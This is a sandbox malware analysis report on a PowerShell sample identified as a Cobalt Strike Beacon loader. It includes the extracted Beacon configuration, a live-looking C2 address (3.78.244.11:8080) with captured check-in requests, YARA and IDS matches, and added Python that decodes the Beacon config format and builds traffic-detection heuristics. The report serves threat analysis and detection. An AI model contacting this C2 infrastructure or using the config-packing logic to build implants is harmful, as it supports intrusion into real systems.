Windows Analysis Report
3.ps1

Overview

General Information

Sample name: 3.ps1
Analysis ID: 1562630
MD5: 69c80576e5413dc4d0d60de98439f649
SHA1: 2fe44c3f073e661eb0cd6dd2c5890b067743ea5d
SHA256: 85856010d3e63101c30a3d061dd55c758350030dd9b14794044a479860abb37f
Tags: ps1, user-nawhack

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected MetasploitPayload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found suspicious powershell code related to unpacking or dynamic code loading
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon offers the attacker a wealth of functionality, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

AV Detection

Source: 3.ps1 Avira: detected
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike
{
  "BeaconType": ["HTTP"],
  "Port": 8080,
  "SleepTime": 60000,
  "MaxGetSize": 1048576,
  "Jitter": 0,
  "C2Server": "3.78.244.11,/dot.gif",
  "HttpPostUri": "/submit.php",
  "Malleable_C2_Instructions": [],
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 0,
  "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
  "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 987654321,
  "bStageCleanup": "False",
  "bCFGCaution": "False",
  "KillDate": 0,
  "bProcInject_StartRWX": "True",
  "bProcInject_UseRWX": "True",
  "bProcInject_MinAllocSize": 0,
  "ProcInject_PrependAppend_x86": "Empty",
  "ProcInject_PrependAppend_x64": "Empty",
  "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"],
  "ProcInject_AllocationMethod": "VirtualAllocEx",
  "bUsesCookies": "True",
  "HostHeader": ""
}
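The extractor line above reports the decoded Beacon settings but not how they are recovered from memory. The following Python is an added example, not Joe Sandbox's extractor and not Cobalt Strike code: it re-packs the values this report recovered into the Beacon config TLV layout (2-byte index, 2-byte type, 2-byte length, value), XORs the block with the 4.x key 0x2e, buries it in constructed junk the way it would sit in a process dump, and then locates and decodes it the way public parsers do (search for the XORed header of setting 1, walk the records until index 0). The setting-index names follow the publicly documented layout used by open-source Beacon parsers; the UserAgent value is taken from the HTTP request recorded later in this report; the sample dump, the 16-byte minimum string padding and the search order of the two known keys are assumptions for the demonstration.

```python
import struct

XOR_KEY_4X, XOR_KEY_3X = 0x2E, 0x69   # Beacon 4.x packs its config XORed with 0x2e, 3.x used 0x69
TYPE_SHORT, TYPE_INT, TYPE_DATA = 1, 2, 3

# Subset of the setting indices used by public Beacon config parsers (assumed layout).
SETTING_NAMES = {
    1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
    8: "C2Server", 9: "UserAgent", 10: "HttpPostUri", 15: "Spawnto_x86",
    16: "Spawnto_x64", 37: "Watermark",
}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP", 8: "HTTPS", 16: "Bind TCP"}


def pack_config(settings):
    """Write settings in the Beacon TLV layout. Only used here to construct a sample;
    the real block is produced by the team server at build time."""
    out = bytearray()
    for idx, (typ, value) in settings.items():
        if typ == TYPE_SHORT:
            data = struct.pack(">H", value)
        elif typ == TYPE_INT:
            data = struct.pack(">I", value)
        else:                                   # strings are NUL-terminated and padded
            data = (value.encode() + b"\x00").ljust(16, b"\x00")
        out += struct.pack(">HHH", idx, typ, len(data)) + data
    out += b"\x00" * 6                          # index 0 terminates the list
    return bytes(out)


def xor_block(block, key=XOR_KEY_4X):
    return bytes(b ^ key for b in block)


def find_and_decode(blob):
    """Locate the encoded config in a memory dump and decode it. Parsers find the
    block by searching for the XORed image of the first record header: setting 1
    (BeaconType), type short, length 2, i.e. b'\\x00\\x01\\x00\\x01\\x00\\x02' ^ key."""
    for key in (XOR_KEY_4X, XOR_KEY_3X):
        marker = xor_block(b"\x00\x01\x00\x01\x00\x02", key)
        pos = blob.find(marker)
        if pos != -1:
            return decode_config(xor_block(blob[pos:], key))
    raise ValueError("no Beacon config block found")


def decode_config(raw):
    """Walk index/type/length records until the terminating index 0."""
    cfg, off = {}, 0
    while off + 6 <= len(raw):
        idx, typ, length = struct.unpack_from(">HHH", raw, off)
        off += 6
        if idx == 0:
            break
        data = raw[off:off + length]
        off += length
        if typ == TYPE_SHORT:
            value = struct.unpack(">H", data)[0]
        elif typ == TYPE_INT:
            value = struct.unpack(">I", data)[0]
        else:
            value = data.split(b"\x00", 1)[0].decode(errors="replace")
        name = SETTING_NAMES.get(idx, f"Setting_{idx}")
        if name == "BeaconType":
            value = BEACON_TYPES.get(value, value)
        cfg[name] = value
    return cfg


def c2_urls(cfg):
    """Derive the check-in (GET) and result (POST) URLs from C2Server/Port/HttpPostUri."""
    host, _, get_uri = cfg["C2Server"].partition(",")
    scheme = "https" if cfg["BeaconType"] == "HTTPS" else "http"
    base = f"{scheme}://{host}:{cfg['Port']}"
    return base + get_uri, base + cfg["HttpPostUri"]


# Constructed sample: the values this report's extractor recovered, re-packed and XORed,
# surrounded by filler bytes standing in for the rest of the dumped region.
SAMPLE_SETTINGS = {
    1: (TYPE_SHORT, 0),                        # 0 = HTTP
    2: (TYPE_SHORT, 8080),
    3: (TYPE_INT, 60000),
    4: (TYPE_INT, 1048576),
    5: (TYPE_SHORT, 0),
    8: (TYPE_DATA, "3.78.244.11,/dot.gif"),
    9: (TYPE_DATA, "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"),
    10: (TYPE_DATA, "/submit.php"),
    15: (TYPE_DATA, "%windir%\\syswow64\\rundll32.exe"),
    16: (TYPE_DATA, "%windir%\\sysnative\\rundll32.exe"),
    37: (TYPE_INT, 987654321),
}
SAMPLE_DUMP = b"MZ\x90\x00" + b"\x41" * 64 + xor_block(pack_config(SAMPLE_SETTINGS)) + b"\x00" * 32

if __name__ == "__main__":
    cfg = find_and_decode(SAMPLE_DUMP)
    for name, value in cfg.items():
        print(f"{name}: {value}")
    print("GET %s\nPOST %s" % c2_urls(cfg))
```

The search-by-marker trick works because the first record of every stock Beacon config is BeaconType as a 2-byte short; once one key decodes that header, the whole block is walked with the same key, which is why the recovered Watermark (987654321) and Spawnto paths above come out byte-exact from a single XOR pass.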
Source: 3.ps1 ReversingLabs: Detection: 73%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 92.5% probability
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0B1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_0000022EFA0B1184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E2020 CryptGenRandom, 0_2_0000022EFA0E2020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_0000022EFA0C1C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_0000022EFA0C9220

Networking

Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49816 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49864 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49915 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49963 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50011 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50012 -> 3.78.244.11:8080
Source: Network traffic Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50013 -> 3.78.244.11:8080
Source: Malware configuration extractor URLs: 3.78.244.11
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 3.78.244.11:8080
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic HTTP traffic detected (12 identical requests recorded; shown once, headers split one per line):
GET /dot.gif HTTP/1.1
Accept: */*
Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: 3.78.244.11:8080
Connection: Keep-Alive
Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 3.78.244.11 (50 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0BE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle, 0_2_0000022EFA0BE68C
Source: global traffic HTTP traffic detected: GET /dot.gif HTTP/1.1 to Host 3.78.244.11:8080 with the same Cookie, User-Agent (Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)), Connection and Cache-Control headers as the request listed under Networking above (12 identical requests recorded)
Source: powershell.exe, 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:%u/
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif1
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif11:8080/dot.gif
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif2
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif9.0
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifD
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifG
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifPDL
Source: powershell.exe, 00000000.00000002.4121724697.0000022EF9D85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifU
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gife
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifll
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifllV
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gifystem32
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.78.244.11:8080/dot.gif~
Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
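The Networking section records three things a detection engineer wants to turn into logic: the check-in request itself, the fact that the C2 address was never resolved through DNS, and a 60-second sleep with zero jitter. The Python below is an added example, not part of the Joe Sandbox report. The request is the one captured above (headers split one per line); the indicator values come from the extracted config; the Cookie check relies on the fact that a stock Beacon sends its session metadata RSA-1024 encrypted, so the base64 value decodes to exactly 128 bytes. The DNS/connection correlation is my approximation of what the "TCP traffic detected without corresponding DNS query" signature does, not the sandbox's own logic, and the two small log tables are constructed (203.0.113.10 is a documentation address).

```python
import base64
import ipaddress

# Request copied from the sandbox capture, headers one per line.
CAPTURED_REQUEST = """GET /dot.gif HTTP/1.1
Accept: */*
Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: 3.78.244.11:8080
Connection: Keep-Alive
Cache-Control: no-cache
"""

# From the extracted config: stock profile URIs, port 8080, SleepTime 60000 ms, Jitter 0.
GET_URI, POST_URI, PORT = "/dot.gif", "/submit.php", 8080
STOCK_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
RSA1024_BLOCK = 128   # Beacon metadata is RSA-1024 encrypted: one 128-byte ciphertext block


def parse_request(text):
    """Split an HTTP/1.1 request into method, URI and a lower-cased header map."""
    lines = text.strip().splitlines()
    method, uri, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "headers": headers}


def metadata_blob(cookie):
    """Decode the Cookie value; None if it is not clean base64."""
    try:
        return base64.b64decode(cookie, validate=True)
    except ValueError:                      # binascii.Error subclasses ValueError
        return None


def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def beacon_indicators(req):
    """List the stock-profile traits a single request exhibits."""
    h, hits = req["headers"], []
    if req["method"] == "GET" and req["uri"] == GET_URI:
        hits.append("default GET URI /dot.gif")
    if req["method"] == "POST" and req["uri"] == POST_URI:
        hits.append("default POST URI /submit.php")
    if h.get("user-agent") == STOCK_UA:
        hits.append("stock MSIE 9.0 user agent")
    host_hdr = h.get("host", "")
    host, _, port = host_hdr.rpartition(":") if ":" in host_hdr else (host_hdr, "", "80")
    if is_bare_ip(host) and port == str(PORT):
        hits.append("bare IP host on port 8080")
    blob = metadata_blob(h.get("cookie", ""))
    if blob is not None and len(blob) == RSA1024_BLOCK:
        hits.append("128-byte RSA-encrypted metadata in Cookie")
    return hits


def connections_without_dns(conn_log, dns_log):
    """Flag external TCP destinations that no earlier DNS answer resolved to.
    conn_log rows: (ts, dst_ip, dst_port); dns_log rows: (ts, answered_ip)."""
    first_seen = {}
    for ts, ip in dns_log:
        first_seen[ip] = min(ts, first_seen.get(ip, ts))
    flagged = set()
    for ts, ip, port in conn_log:
        if ipaddress.ip_address(ip).is_private:    # sandbox LAN / gateway traffic
            continue
        if ip not in first_seen or first_seen[ip] > ts:
            flagged.add((ip, port))
    return sorted(flagged)


def checkin_gaps(conn_log, c2_ip):
    """Seconds between successive connections to one host; a flat series matches
    SleepTime 60000 with Jitter 0 from the config."""
    ts = sorted(t for t, ip, _ in conn_log if ip == c2_ip)
    return [round(b - a, 1) for a, b in zip(ts, ts[1:])]


# Constructed log excerpt: three direct-to-IP check-ins 60 s apart, one ordinary
# connection preceded by a DNS answer, and one LAN packet that must be ignored.
SAMPLE_DNS = [(98.0, "203.0.113.10")]
SAMPLE_CONN = [
    (100.0, "3.78.244.11", 8080),
    (100.5, "192.168.2.1", 53),
    (101.0, "203.0.113.10", 443),
    (160.0, "3.78.244.11", 8080),
    (220.0, "3.78.244.11", 8080),
]

if __name__ == "__main__":
    req = parse_request(CAPTURED_REQUEST)
    print("indicators:", beacon_indicators(req))
    print("no-DNS destinations:", connections_without_dns(SAMPLE_CONN, SAMPLE_DNS))
    print("check-in gaps:", checkin_gaps(SAMPLE_CONN, "3.78.244.11"))
```

Each trait on its own is weak (plenty of legitimate software fetches /dot.gif or sends an old MSIE string), which is why the function returns the list rather than a verdict: the combination of a stock URI, a stock user agent, a bare-IP Host header, a 128-byte opaque cookie and a metronomic 60-second interval with no DNS lookup is what makes this traffic unmistakably a default-profile Beacon, and operators who customize the Malleable C2 profile remove the first two traits while the last three survive.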

System Summary

Source: 3.ps1, type: SAMPLE Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: amsi64_1900.amsi.csv, type: OTHER Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
